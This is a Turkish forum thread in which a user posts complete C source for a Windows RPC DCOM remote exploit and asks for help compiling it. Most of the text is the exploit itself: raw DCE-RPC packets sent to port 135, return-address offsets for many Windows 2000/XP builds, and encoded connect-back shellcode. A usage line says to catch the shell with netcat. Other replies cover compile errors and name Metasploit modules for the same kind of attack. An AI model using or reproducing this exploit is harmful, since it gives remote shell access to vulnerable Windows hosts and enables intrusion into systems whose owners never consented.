


Bu Exploit İ Bi Zahmet Derlermisiniz (C)Dilinde

    Mx0TBT
    Kayıt Tarihi: 13/Haziran/2007
    Erkek
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <errno.h>
    #include <string.h>
    #include <netdb.h>
    #include <sys/types.h>
    #include <netinet/in.h>
    #include <sys/socket.h>

    #define DWORD unsigned long
    #define SOCKET_ERROR -1

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x5C,0x00
    ,0x43,0x00,0x24,0x00,0x5C,0x00,0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



    /* Myam add OFFSETS*/
    char win2knosppl[] = "\x4d\x3f\xe3\x77"; /* polish win2k nosp ver 5.00.2195*/
    char win2ksp3pl[] = "\x29\x2c\xe4\x77"; /* polish win2k sp3 - ver 5.00.2195 tested */
    char win2ksp4sp[] = "\x13\x3b\xa5\x77"; /* spanish win2k sp4 */
    char win2knospeng1[] = "\x74\x16\xe8\x77"; /* english win2k nosp 1 */
    char win2knospeng2[] = "\x6d\x3f\xe3\x77"; /* english win2k nosp 2 */
    char win2ksp1eng[] = "\xec\x29\xe8\x77"; /* english win2k sp1 */
    char win2ksp2eng1[] = "\x2b\x49\xe2\x77"; /* english win2k sp2 1 */
    char win2ksp2eng2[] = "\xb5\x24\xe8\x77"; /* english win2k sp2 2 */
    char win2ksp3eng1[] = "\x7a\x36\xe8\x77"; /* english win2k sp3 1 */
    char win2ksp3eng2[] = "\x5c\xfa\x2e\x77"; /* english win2k sp3 2 */
    char win2ksp4eng[] = "\x9b\x2a\xf9\x77"; /* english win2k sp4 */
    char win2ksp3chi[] = "\x44\x43\x42\x41"; /* china win2k sp3 */
    char win2ksp4chi[] = "\x29\x4c\xdf\x77"; /* china win2k sp4 */
    char win2ksp3ger[] = "\x7a\x88\x2e\x77"; /* german win2k sp3 */
    char win2ksp2jap[] = "\x2b\x49\xdf\x77"; /* japanese win2k sp2 */
    char winxpnospeng[] = "\xe3\xaf\xe9\x77"; /* english xp nosp ver 5.1.2600 */
    char winxpsp1eng1[] = "\xba\x26\xe6\x77"; /* english xp sp1 1 */
    char winxpsp1eng2[] = "\xdb\x37\xd7\x77"; /* english xp sp1 2 */
    char winxpsp2eng[] = "\xbd\x73\x7d\x77"; /* english xp sp2 */





    /* Test this offset
    ( Japanese Windows 2000 Pro SP2 ) : 0x77DF492B
    Windows 2000 (no-service-pack) English 0x77e33f6d
    0x77f92a9b
    0x77e2afc5
    0x772254b0 win2k3
    0x77E829E3 / 0x77E83587 kokanin win2k sp3
    */
    unsigned char sc[]=
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x4E\x00\x42\x00\x46\x00\x58\x00\x46\x00\x58\x00"
    "\x46\x00\x58\x00\x46\x00\x58\x00"


    "\x29\x4c\xdf\x77" //sp4
    //"\x29\x2c\xe2\x77"//0x77e22c29


    "\x38\x6e\x16\x76\x0d\x6e\x16\x76"
    //&#19979;&#38754;&#26159;SHELLCODE&#65292;&#21487;&#20197
    //SHELLCODE&#19981;&#23384;&#22312;0X00&#65292;0X00&#19982;0X5C
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xfc\xff\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\x93\x40\xe2\xfa"
    // code
    "\x7b\xe4\x93\x93\x93\xd4\xf6\xe7\xc3\xe1\xfc\xf0\xd2\xf7\xf7\xe1"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xdf\xfa\xf1\xe1\xf2\xe1\xea\xd2"
    "\x93\xd0\xe1\xf6\xf2\xe7\xf6\xc3\xe1\xfc\xf0\xf6\xe0\xe0\xd2\x93"
    "\xd0\xff\xfc\xe0\xf6\xdb\xf2\xfd\xf7\xff\xf6\x93\xd6\xeb\xfa\xe7"
    "\xc7\xfb\xe1\xf6\xf2\xf7\x93\xe4\xe0\xa1\xcc\xa0\xa1\x93\xc4\xc0"
    "\xd2\xc0\xe7\xf2\xe1\xe7\xe6\xe3\x93\xc4\xc0\xd2\xc0\xfc\xf0\xf8"
    "\xf6\xe7\xd2\x93\xf0\xff\xfc\xe0\xf6\xe0\xfc\xf0\xf8\xf6\xe7\x93"
    "\xf0\xfc\xfd\xfd\xf6\xf0\xe7\x93\xf0\xfe\xf7\x93\xc9\xc1\x28\x93"
    "\x93\x63\xe4\x12\xa8\xde\xc9\x03\x93\xe7\x90\xd8\x78\x66\x18\xe0"
    "\xaf\x90\x60\x18\xe5\xeb\x90\x60\x18\xed\xb3\x90\x68\x18\xdd\x87"
    "\xc5\xa0\x53\xc4\xc2\x18\xac\x90\x68\x18\x61\xa0\x5a\x22\x9d\x60"
    "\x35\xca\xcc\xe7\x9b\x10\x54\x97\xd3\x71\x7b\x6c\x72\xcd\x18\xc5"
    "\xb7\x90\x40\x42\x73\x90\x51\xa0\x5a\xf5\x18\x9b\x18\xd5\x8f\x90"
    "\x50\x52\x72\x91\x90\x52\x18\x83\x90\x40\xcd\x18\x6d\xa0\x5a\x22"
    "\x97\x7b\x08\x93\x93\x93\x10\x55\x98\xc1\xc5\x6c\xc4\x63\xc9\x18"
    "\x4b\xa0\x5a\x22\x97\x7b\x14\x93\x93\x93\x10\x55\x9b\xc6\xfb\x92"
    "\x92\x93\x93\x6c\xc4\x63\x16\x53\xe6\xe0\xc3\xc3\xc3\xc3\xd3\xc3"
    "\xd3\xc3\x6c\xc4\x67\x10\x6b\x6c\xe7\xf0\x18\x4b\xf5\x54\xd6\x93"
    "\x91\x93\xf5\x54\xd6\x91\x28\x39\x54\xd6\x97\x4e\x5f\x28\x39\xf9"
    "\x83\xc6\xc0\x6c\xc4\x6f\x16\x53\xe6\xd0\xa0\x5a\x22\x82\xc4\x18"
    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";

    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };

    int main(int argc,char ** argv)
    {

    int len, len1, sockfd;
    short port=135;
    struct hostent *he;
    struct sockaddr_in their_addr;


    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;


    DWORD cb;



    printf("OC192 RPC DCOM Remote Exploit BSD/Linux Port, thanks LSD and XFORCE\n");


    if(argc<5)
    {

    printf("[<$>] OC192 RPC Remote Windows Exploit\n");
    printf("[<$>] by pHrail and smurfy + some offsets by teos\n");
    printf("[<$>] Thanks to LSD and XForce\n");
    printf("[<$>] Usage: %s <victim> <connectback ip> <cb port> <target>\n",argv[0]);
    printf("[<$>] On connect back nc -lp cbport\n");
    printf("[<$>] Targets: 0 Win2k Polish nosp ver 5.00.2195\n");
    printf("[<$>] 1 Win2k Polish +sp3 ver 5.00.2195\n");
    printf("[<$>] 2 Win2k Spanish +sp4\n");
    printf("[<$>] 3 Win2k English nosp 1\n");
    printf("[<$>] 4 Win2k English nosp 2\n");
    printf("[<$>] 5 Win2k English +sp1\n");
    printf("[<$>] 6 Win2k English +sp2 1\n");
    printf("[<$>] 7 Win2k English +sp2 2\n");
    printf("[<$>] 8 Win2k English +sp3 1\n");
    printf("[<$>] 9 Win2k English +sp3 2\n");
    printf("[<$>] 10 Win2k English +sp4\n");
    printf("[<$>] 11 Win2k China +sp3\n");
    printf("[<$>] 12 Win2k China +sp4\n");
    printf("[<$>] 13 Win2k German +sp3\n");
    printf("[<$>] 14 Win2k Japanese +sp2\n");
    printf("[<$>] 15 WinXP English nosp ver 5.1.2600\n");
    printf("[<$>] 16 WinXP English +sp1 1\n");
    printf("[<$>] 17 WinXP English +sp1 2\n");
    printf("[<$>] 18 WinXP English +sp2\n");
    exit(1);
    }


    if ((he=gethostbyname(argv[1])) == NULL) { // get the host info

    perror("gethostbyname");

    exit(1);

    }

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {

    perror("socket");

    exit(1);

    }


    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(port);
    their_addr.sin_addr = *((struct in_addr *)he->h_addr);
    memset(&(their_addr.sin_zero), '\0', 8);


    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1) {
    printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

    exit(1);
    }



    if(atoi(argv[4])==0)
    memcpy(sc+36,win2knosppl,sizeof(win2knosppl));
    else if (atoi(argv[4])==1)
    memcpy(sc+36,win2ksp3pl,sizeof(win2ksp3pl));
    else if (atoi(argv[4])==2)
    memcpy(sc+36,win2ksp4sp,sizeof(win2ksp4sp));
    else if (atoi(argv[4])==3)
    memcpy(sc+36,win2knospeng1,sizeof(win2knospeng1));
    else if (atoi(argv[4])==4)
    memcpy(sc+36,win2knospeng2,sizeof(win2knospeng2));
    else if (atoi(argv[4])==5)
    memcpy(sc+36,win2ksp1eng,sizeof(win2ksp1eng));
    else if (atoi(argv[4])==6)
    memcpy(sc+36,win2ksp2eng1,sizeof(win2ksp2eng1));
    else if (atoi(argv[4])==7)
    memcpy(sc+36,win2ksp2eng2,sizeof(win2ksp2eng2));
    else if (atoi(argv[4])==8)
    memcpy(sc+36,win2ksp3eng1,sizeof(win2ksp3eng1));
    else if (atoi(argv[4])==9)
    memcpy(sc+36,win2ksp3eng2,sizeof(win2ksp3eng2));
    else if (atoi(argv[4])==10)
    memcpy(sc+36,win2ksp4eng,sizeof(win2ksp4eng));
    else if (atoi(argv[4])==11)
    memcpy(sc+36,win2ksp3chi,sizeof(win2ksp3chi));
    else if (atoi(argv[4])==12)
    memcpy(sc+36,win2ksp4chi,sizeof(win2ksp4chi));
    else if (atoi(argv[4])==13)
    memcpy(sc+36,win2ksp3ger,sizeof(win2ksp3ger));
    else if (atoi(argv[4])==14)
    memcpy(sc+36,win2ksp2jap,sizeof(win2ksp2jap));
    else if (atoi(argv[4])==15)
    memcpy(sc+36,winxpnospeng,sizeof(winxpnospeng));
    else if (atoi(argv[4])==16)
    memcpy(sc+36,winxpsp1eng1,sizeof(winxpsp1eng1));
    else if (atoi(argv[4])==17)
    memcpy(sc+36,winxpsp1eng2,sizeof(winxpsp1eng2));
    else if (atoi(argv[4])==18)
    memcpy(sc+36,winxpsp2eng,sizeof(winxpsp2eng));
    port1 = htons(atoi(argv[3]));
    port1 ^= 0x9393;
    cb=inet_addr(argv[2]);
    cb ^= 0x93939393;
    *(unsigned short *)&sc[330+0x30] = port1;
    *(unsigned int *)&sc[335+0x30] = cb;
    len=sizeof(sc);
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);

    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;



    if(send(sockfd, bindstr, sizeof(bindstr), 0)== -1){
    printf("Send failed pussy.\n");
    exit(1);
    }

    len=recv(sockfd,buf1,1000,NULL);
    if (send(sockfd,buf2,len1,0)==SOCKET_ERROR) {

    printf("Send failed pussy\n");
    return;
    }
    len=recv(sockfd,buf1,1024,NULL);

    }
     
    adresi: http://milw0rm.org/exploits/69
    bi türlü derleyemedim windows'ta

    Ölümlü dünya. Yasin 38. Ayet
    RhiFaT
    Kayıt Tarihi: 11/Mart/2004
    Erkek

    bunu sanırım sadece cygwin ile derleyebilirsin ama o da sorunlu olur, zira kütüphane dosyaları sorunlu olabilir.

    en iyisi linuxta derle, mesela cd'den çalışan bi linux cd'si ile dene

     


    işte öyle
    Mx0TBT
    Kayıt Tarihi: 13/Haziran/2007
    Erkek
    bende şu an linux yok, backtrack vardı yanlışlıkla silindi. windows'ta denedim hata verdi. linux kullanan mürid vardır illaki, bi yardım

    Ölümlü dünya. Yasin 38. Ayet
    tLG
    Kayıt Tarihi: 08/Aralık/2008
    Erkek
    bendeki visual c++ 6.0 ile denedim, 1 adet hata olduğundan dolayı derlemiyor.

    "Geri geri çıkarken, biiip biiip sesi çıkaran araçların seslerini zil sesi yapmayı sevenlerin buluşma noktası" diye bi grup açsam katılır mısın lan feysbuk"ta?
    Yeah
    Kayıt Tarihi: 02/Ekim/2007
    Erkek
    ne işe yarıyor ki bu :W

    herşeyin kısası makbuldur; ulaşmak isteyen yesterfox_55@hotmail.com a mail atabilir...
    Mx0TBT
    Kayıt Tarihi: 13/Haziran/2007
    Erkek

    tLG bunu yazdı:
    -----------------------------
    bendeki visual c++ 6.0 ile denedim 1 adet hata olduğundan dolayı derlemiyor.
    -----------------------------

    bende windows'ta dev c ile derlemeye çalıştım, 1 adet hata aldım. napcaz bunu yaw, derlemem lazım


    Ölümlü dünya. Yasin 38. Ayet
    Yeah
    Kayıt Tarihi: 02/Ekim/2007
    Erkek

    linux'um vardı ama şevkim kaçtı, derlemicem :W

     

    edit: yeah.c:340: UYARI: passing argument 4 of 'recv' makes integer from pointer without a cast 

    ne diyor lan bu, zerre anlamam bu işlerden. neyse madem, geri adım attım ben :W


    herşeyin kısası makbuldur; ulaşmak isteyen yesterfox_55@hotmail.com a mail atabilir...
    cnr437
    Banlanmış Üye
    Kayıt Tarihi: 03/Nisan/2007
    Erkek

    cnm bu metasploit'in içinde zaten hazır var,

    rpc dcom bu

     windows/dcerpc/ms03_026_dcom

    yada bunlar,

     windows/dcerpc/ms05_017_msmq

     windows/dcerpc/ms07_065_msmq

     


    Bizim olduğumuz her yerde herşey bizim yüzümüzden olmuştur. Ben benim amk bana bişey olmasın!
    Emrow
    Banlanmış Üye
    Kayıt Tarihi: 17/Mart/2007
    Erkek
    devlen derleyn..kütüp eksikse indiriğğnn..
    Mx0TBT
    Kayıt Tarihi: 13/Haziran/2007
    Erkek

    hacı senin bu verdiklerin sp 0 ve altı için, benim bu exploit ise sp2 için

    bi de kütüphaneyi nasıl indircez, nasıl yüklücez


    Ölümlü dünya. Yasin 38. Ayet
    cnr437
    Banlanmış Üye
    Kayıt Tarihi: 03/Nisan/2007
    Erkek

    hem linuxta derlesen de exe olmayacak,

    linux için derlenecek.

    o yüzden windowsta library'leri tamamla, ondan sonra derle


    Bizim olduğumuz her yerde herşey bizim yüzümüzden olmuştur. Ben benim amk bana bişey olmasın!